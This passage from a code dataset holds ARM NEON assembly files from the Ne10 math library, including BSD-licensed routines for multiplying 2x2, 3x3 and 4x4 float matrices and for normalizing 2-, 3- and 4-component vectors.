@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r2, r1, #3 @ r2 = count % 4;
sub r1, r1, r2 @ count = count - r2; This is what's left to be processed after this loop
vmov.f32 d2, #0.0
vmov.f32 d3, #0.0
vmov.f32 d0, #1.0
vmov.f32 d1, #1.0
vmov q8 , q1
vmov q9 , q1
vmov q10, q1
vmov q11, q1
vmov q12, q1
vmov q13, q1
vmov q14, q1
vmov q15, q1
vtrn.32 d2, d0 @ d0 = {0.0f, 1.0f}
vtrn.32 d1, d3 @ d1 = {1.0f, 0.0f}
vmov d16, d1
vmov d18, d0
vmov d21, d1
vmov d23, d0
vmov d24, d1
vmov d26, d0
vmov d29, d1
vmov d31, d0
cmp r1, #0
beq .L_check_mat4x4
.L_mainloop_mat4x4:
subs r1, r1, #2
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
vst4.32 { d24 , d26 , d28 , d30 }, [r0]!
vst4.32 { d25 , d27 , d29 , d31 }, [r0]!
bgt .L_mainloop_mat4x4 @ loop if r1 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_mat4x4:
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r2, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array
subs r2, r2, #1
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 18,322 | modules/math/NE10_mulmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mulmat_2x2f_neon
.thumb
.thumb_func
ne10_mulmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulmat_2x2f(arm_mat2x2f_t * dst,
@ arm_mat2x2f_t * src1,
@ arm_mat2x2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_mat2x2
@ We load four 2x2 matrices at a time, multiply them to
@ get two resulting 2x2 matrices, store them in the destination
@ and then move on to the next four matrices.
@ load the 1st set of values
vld4.32 { d0, d1, d2, d3 }, [r1]!
vld4.32 { d4, d5, d6, d7 }, [r2]!
subs r3, r3, #4 @ 2 for this set, and 2 for the 2nd set
@ calculate values for the 1st set
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
@ load the 2nd set of values
vld4.32 { d0, d1, d2, d3 }, [r1]!
vld4.32 { d4, d5, d6, d7 }, [r2]!
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for the 1st/next (e.g. 3rd) set
vst4.32 { d16, d17, d18, d19}, [r0]!
@ calculate values for the 2nd/next (e.g. 3rd) set
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
@ load the next (e.g. 3rd) set of values
subs r3, r3, #2
vld4.32 { d0, d1, d2, d3 }, [r1]!
vld4.32 { d4, d5, d6, d7 }, [r2]!
bgt .L_mainloop_mat2x2 @ loop if r2 is > r3, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the set of values before the last one (e.g 2nd set)
vst4.32 { d16, d17, d18, d19}, [r0]!
@ calculate values for the last (e.g. 3rd) set
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
@ store the result for the last (e.g. 3rd) set
vst4.32 { d16, d17, d18, d19}, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array
vld4.32 { d0[0], d1[0], d2[0], d3[0] }, [r1]!
vld4.32 { d4[0], d5[0], d6[0], d7[0] }, [r2]!
subs r4, r4, #1
@ calculate values
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
vst4.32 { d16[0], d17[0], d18[0], d19[0] }, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load four 3x3 matrices, two from the first source which
@ according to the function signatures is src1 (r1) and
@ another two from the second source which is src2 (r2)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_3x3MATS
# load two 3x3 matrices from src1
vld1.32 { q0-q1 }, [r1]!
vld1.32 { d8[0] }, [r1]!
vld1.32 { q2-q3 }, [r1]!
vld1.32 { d8[1] }, [r1]!
# load two 3x3 matrices from src2
vld1.32 { q8-q9 }, [r2]!
vld1.32 { d9[0] }, [r2]!
vld1.32 { q10-q11 }, [r2]!
vld1.32 { d9[1] }, [r2]!
# rearrange them both
vtrn.32 q0, q2
vtrn.32 q1, q3
vtrn.32 q8, q10
vtrn.32 q9, q11
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies two pairs of 3x3 matrices that were
@ loaded using the above LOAD_3x3MATS macro in registers q0-q11.
@ The two resulting matrices are returned in q12, q13, q14, q15, & d9
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MULTIPLY_3x3MATS
@ a = d0 & d16
@ b = d4 & d20
@ c = d1 & d17
@ d = d5 & d21
@ e = d2 & d18
@ f = d6 & d22
@ g = d3 & d19
@ h = d7 & d23
@ i = d8 & d9
vmul.f32 d24, d0, d16
vmul.f32 d28, d4, d16
vmul.f32 d25, d1, d16
vmul.f32 d29, d0, d21
vmul.f32 d26, d4, d21
vmul.f32 d30, d1, d21
vmul.f32 d27, d0, d19
vmul.f32 d31, d4, d19
vmul.f32 d10, d1, d19
vmla.f32 d24, d5, d20
vmla.f32 d28, d2, d20
vmla.f32 d25, d6, d20
vmla.f32 d29, d5, d18
vmla.f32 d26, d2, d18
vmla.f32 d30, d6, d18
vmla.f32 d27, d5, d23
vmla.f32 d31, d2, d23
vmla.f32 d10, d6, d23
vmla.f32 d24, d3, d17
vmla.f32 d28, d7, d17
vmla.f32 d25, d8, d17
vmla.f32 d29, d3, d22
vmla.f32 d26, d7, d22
vmla.f32 d30, d8, d22
vmla.f32 d27, d3, d9
vmla.f32 d31, d7, d9
vmla.f32 d10, d8, d9
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to store the two resulting 3x3 matrices from
@ the above MULTIPLY_3x3MATS macro (q12-q15, & d9 are stored)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_3x3MATS
# rearrange them both
vtrn.32 q12, q14
vtrn.32 q13, q15
# store two 3x3 matrices to dst
vst1.32 { q12-q13 }, [r0]!
vst1.32 { d10[0] }, [r0]!
vst1.32 { q14-q15 }, [r0]!
vst1.32 { d10[1] }, [r0]!
.endm
.align 2
.global ne10_mulmat_3x3f_neon
.thumb
.thumb_func
ne10_mulmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulmat_3x3f(arm_mat3x3f_t * dst,
@ arm_mat3x3f_t * src1,
@ arm_mat3x3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push { r4 }
vpush { d8, d9, d10 }
and r4, r3, #3 @ r3 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_mat3x3
@ load the 1st set of values
LOAD_3x3MATS
subs r3, r3, #4 @ 2 for this set, and 2 for the 2nd set
@ calculate values for the 1st set
MULTIPLY_3x3MATS
@ load the 2nd set of values
LOAD_3x3MATS
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the 1st/next (e.g. 3rd) set
STORE_3x3MATS
@ calculate values for the 2nd/next (e.g. 3rd) set
MULTIPLY_3x3MATS
@ load the next (e.g. 3rd) set of values
LOAD_3x3MATS
subs r3, r3, #2
bgt .L_mainloop_mat3x3 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the set of values before the last one (e.g 2nd set)
STORE_3x3MATS
@ calculate values for the last (e.g. 3rd) set
MULTIPLY_3x3MATS
@ store the result for the last (e.g. 3rd) set
STORE_3x3MATS
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array
@ load the next (e.g. 3rd) set of values
vld1.32 { q0-q1 }, [r1]!
vld1.32 { d8[0] }, [r1]!
vld1.32 { q8-q9 }, [r2]!
vld1.32 { d9[0] }, [r2]!
vtrn.32 q0, q2
vtrn.32 q1, q3
vtrn.32 q8, q10
vtrn.32 q9, q11
subs r4, r4, #1
@ calculate values for the last (e.g. 3rd) set
MULTIPLY_3x3MATS
@ store the result for the last (e.g. 3rd) set
vtrn.32 q12, q14
vtrn.32 q13, q15
vst1.32 { q12-q13 }, [r0]!
vst1.32 { d10[0] }, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return
vpop { d8, d9, d10 }
pop { r4 }
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load a pair of 4x4 matrices from src1 (r1) and
@ src2 (r2) into registers q0-q3 & q8-q11.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_4x4MATS
# load a 4x4 matrix from src1
vld1.32 { q8-q9 }, [r1]!
vld1.32 {q10-q11}, [r1]!
# load a 4x4 matrix from src2
vld1.32 {q0-q1}, [r2]!
vld1.32 {q2-q3}, [r2]!
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies the two 4x4 matrices loaded in the
@ above LOAD_4x4MATS macro and returns the resulting 4x4
@ matrix in q12-q15.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MULTIPLY_4x4MATS
vmul.f32 q12, q8, d0[0]
vmul.f32 q13, q8, d2[0]
vmul.f32 q14, q8, d4[0]
vmul.f32 q15, q8, d6[0]
vmla.f32 q12, q9, d0[1]
vmla.f32 q13, q9, d2[1]
vmla.f32 q14, q9, d4[1]
vmla.f32 q15, q9, d6[1]
vmla.f32 q12, q10, d1[0]
vmla.f32 q13, q10, d3[0]
vmla.f32 q14, q10, d5[0]
vmla.f32 q15, q10, d7[0]
vmla.f32 q12, q11, d1[1]
vmla.f32 q13, q11, d3[1]
vmla.f32 q14, q11, d5[1]
vmla.f32 q15, q11, d7[1]
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores the resulting 4x4 matrix which is
@ returned by the above MULTIPLY_4x4MATS macro from registers
@ q12-q15 into the dst (r0).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_4x4MATS
# store two 3x3 matrices to dst
vst1.32 { q12-q13 }, [r0]!
vst1.32 { q14-q15 }, [r0]!
.endm
.align 2
.global ne10_mulmat_4x4f_neon
.thumb
.thumb_func
ne10_mulmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulmat_4x4f(arm_mat4x4f_t * dst,
@ arm_mat4x4f_t * src1,
@ arm_mat4x4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_mat4x4
@ load the 1st set of values
LOAD_4x4MATS
subs r3, r3, #2
@ calculate values for the 1st set
MULTIPLY_4x4MATS
@ load the 2nd set of values
LOAD_4x4MATS
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the 1st/next (e.g. 3rd) set
STORE_4x4MATS
@ calculate values for the 2nd/next (e.g. 3rd) set
MULTIPLY_4x4MATS
@ load the next (e.g. 3rd) set of values
subs r3, r3, #1
LOAD_4x4MATS
bgt .L_mainloop_mat4x4 @ loop if r2 is > r3, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the set of values before the last one (e.g 2nd set)
STORE_4x4MATS
@ calculate values for the last (e.g. 3rd) set
MULTIPLY_4x4MATS
@ store the result for the last (e.g. 3rd) set
STORE_4x4MATS
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array
LOAD_4x4MATS
subs r4, r4, #1
@ calculate values
MULTIPLY_4x4MATS
@ store the results
STORE_4x4MATS
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 14,715 | modules/math/NE10_normalize.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_normalize.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_normalize_vec2f_neon
.thumb
.thumb_func
ne10_normalize_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_vec2
@ load values for the first iteration
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ load the next set of values
vmov.f32 q10, q0
vmov.f32 q11, q1
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ get reciprocal SQRT of the last vector while loading a new vector
vrsqrte.f32 q3, q2
vmul.f32 q4, q2, q3
vrsqrts.f32 q4, q4, q3
vmul.f32 q4, q3, q4
@ normalize the components
vmul.f32 q3, q10, q4 @ q3 = q0(8) * q4
vmul.f32 q4, q11, q4 @ q4 = q1(9) * q4
vst2.32 {d6,d7,d8,d9}, [r0]!
@ calculate sum of square of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
bgt .L_mainloop_vec2 @ loop if r2 is > r3, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ get reciprocal SQRT of the last vector
vrsqrte.f32 q3, q2
vmul.f32 q4, q2, q3
vrsqrts.f32 q4, q4, q3
vmul.f32 q4, q3, q4
@ normalize the components
vmul.f32 q3, q0, q4 @ q3 = q0 * q4
vmul.f32 q4, q1, q4 @ q4 = q1 * q4
vst2.32 {d6,d7,d8,d9}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r1]! @ Fill in d0 = { V.x, V.y };
subs r3, r3, #1
@ calculate sum of square of the components
vmul.f32 d1, d0, d0 @ d1= { V.x^2, V.y^2 };
vpadd.f32 d3, d1, d1 @ d3= { V.x^2 + (V.y^2), V.y^2 + (V.x^2) };
@ get reciprocal SQRT of the last vector
vrsqrte.f32 d2, d3
vmul.f32 d1, d3, d2
vrsqrts.f32 d1, d1, d2
vmul.f32 d1, d2, d1
@ normalize the components
vmul.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return
mov r0, #0
bx lr
.align 2
.global ne10_normalize_vec3f_neon
.thumb
.thumb_func
ne10_normalize_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec3f(arm_vec3t_t * dst,
@ arm_vec3f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_vec3
@ load values for the first iteration
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q3, q0, q0
vmla.f32 q3, q1, q1
vmla.f32 q3, q2, q2
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ load the next set of values
vmov.f32 q10, q0
vmov.f32 q11, q1
vmov.f32 q12, q2
vld3.32 {d0,d2,d4}, [r1]!
vld3.32 {d1,d3,d5}, [r1]!
subs r2, r2, #4
@ get reciprocal SQRT of the last vector while loading a new vector
vrsqrte.f32 q5, q3
vmul.f32 q4, q3, q5
vrsqrts.f32 q4, q4, q5
vmul.f32 q4, q5, q4
@ normalize the components
vmul.f32 q5, q10, q4
vmul.f32 q6, q11, q4
vmul.f32 q7, q12, q4
vst3.32 {d10, d12, d14}, [r0]!
vst3.32 {d11, d13, d15}, [r0]!
@ calculate sum of square of the components
vmul.f32 q3, q0, q0
vmla.f32 q3, q1, q1
vmla.f32 q3, q2, q2
bgt .L_mainloop_vec3 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ get reciprocal SQRT of the last vector
vrsqrte.f32 q5, q3
vmul.f32 q4, q3, q5
vrsqrts.f32 q4, q4, q5
vmul.f32 q4, q5, q4
@ normalize the components
vmul.f32 q5, q0, q4
vmul.f32 q6, q1, q4
vmul.f32 q7, q2, q4
vst3.32 {d10, d12, d14}, [r0]!
vst3.32 {d11, d13, d15}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
@ calculate sum of square of the components
vmul.f32 q3, q0, q0 @ V.x^2
vmla.f32 q3, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q3, q2, q2 @ V.x^2 + V.y^2 + V.z^2
@ get reciprocal SQRT of the last vector
vrsqrte.f32 q5, q3
vmul.f32 q4, q3, q5
vrsqrts.f32 q4, q4, q5
vmul.f32 q4, q5, q4
@ normalize the components
vmul.f32 q0, q0, q4
vmul.f32 q1, q1, q4
vmul.f32 q2, q2, q4
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return
mov r0, #0
bx lr
.align 2
.global ne10_normalize_vec4f_neon
.thumb
.thumb_func
ne10_normalize_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src,
@ unsigned int count);
@
@ r0: *dst & the current dst entry's address
@ r1: *src & current src entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@ r3: the number of items that are left to be processed at the end of
@ the input array
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_vec4
@ load values for the first iteration
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate sum of square of the components
vmul.f32 q5, q0, q0
vmla.f32 q5, q1, q1
vmla.f32 q5, q2, q2
vmla.f32 q5, q3, q3
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ load the next set of values
vmov q10, q0
vmov q11, q1
vmov q12, q2
vmov q13, q3
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ get reciprocal SQRT of the last vector while loading a new vector
vrsqrte.f32 q6, q5
vmul.f32 q4, q5, q6
vrsqrts.f32 q4, q4, q6
vmul.f32 q4, q6, q4
@ normalize the components
vmul.f32 q10, q10, q4
vmul.f32 q11, q11, q4
vmul.f32 q12, q12, q4
vmul.f32 q13, q13, q4
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
@ calculate sum of square of the components
vmul.f32 q5, q0, q0
vmla.f32 q5, q1, q1
vmla.f32 q5, q2, q2
vmla.f32 q5, q3, q3
bgt .L_mainloop_vec4 @ loop if r2 is > r3, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ get reciprocal SQRT of the last vector
vrsqrte.f32 q6, q5
vmul.f32 q4, q5, q6
vrsqrts.f32 q4, q4, q6
vmul.f32 q4, q6, q4
@ normalize the components
vmul.f32 q0, q0, q4
vmul.f32 q1, q1, q4
vmul.f32 q2, q2, q4
vmul.f32 q3, q3, q4
vst4.32 {d0, d2, d4, d6}, [r0]!
vst4.32 {d1, d3, d5, d7}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld4.f32 {d0[0], d2[0], d4[0], d6[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
@ calculate sum of square of the components
vmul.f32 q4, q0, q0 @ V.x^2
vmla.f32 q4, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q4, q2, q2 @ V.x^2 + V.y^2 + V.z^2
vmla.f32 q4, q3, q3 @ V.x^2 + V.y^2 + V.z^2 + V.w^2
@ get reciprocal SQRT of the last vector
vrsqrte.f32 q5, q4
vmul.f32 q6, q4, q5
vrsqrts.f32 q6, q6, q5
vmul.f32 q6, q5, q6
@ normalize the components
vmul.f32 q0, q0, q6
vmul.f32 q1, q1, q6
vmul.f32 q2, q2, q6
vmul.f32 q3, q3, q6
vst4.32 {d0[0], d2[0], d4[0], d6[0]}, [r0]! @ The values are loaded like so:
bgt .L_secondloop_vec4
.L_return_vec4:
@ return
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,791 | modules/math/NE10_divc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
